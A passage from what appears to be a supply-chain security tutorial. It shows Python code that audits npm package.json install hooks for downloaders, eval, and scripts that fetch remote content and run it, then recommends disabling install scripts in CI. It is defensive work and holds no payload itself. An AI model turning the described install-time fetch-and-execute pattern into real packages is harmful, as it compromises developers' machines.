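    `files` maps packaged file names to contents so that a hook such as
    "node setup.js" can be followed into the script it actually runs."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = []
        urls = URL_RE.findall(cmd)
        if DOWNLOADER_RE.search(cmd):
            reasons.append("downloader/decoder/eval in hook command")
        m = NODE_FILE_RE.search(cmd)
        if m and m.group(1) in files:
            body = files[m.group(1)]
            urls += URL_RE.findall(body)
            if JS_FETCH_RE.search(body) and JS_DANGER_RE.search(body):
                reasons.append(f"{m.group(1)} fetches remote content and evaluates or spawns it")
        hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
        if hosts:
            reasons.append("remote hosts referenced: " + ", ".join(hosts))
        if reasons:
            findings.append({"package": manifest.get("name", "?"), "hook": hook,
                             "command": cmd, "reasons": reasons})
    return findings


def audit_package_json(text: str, files: dict) -> list:
    """Convenience wrapper for a raw package.json document."""
    return audit_package(json.loads(text), files)


if __name__ == "__main__":
    for manifest, files in ((BENIGN, {}), (MALICIOUS, MALICIOUS_FILES), (CURL_PIPE, {})):
        print(manifest["name"], audit_package(manifest, files))
```

Lifecycle hooks are legitimate and common (native builds through `node-gyp`, for instance), so the audit reports reasons rather than a verdict, and a reviewer still has to look at anything flagged. The cheap preventive control is `npm ci --ignore-scripts` in CI and on developer machines, with scripts re-enabled only for the handful of packages that need them; that single setting would have stopped a preinstall payload from running at all.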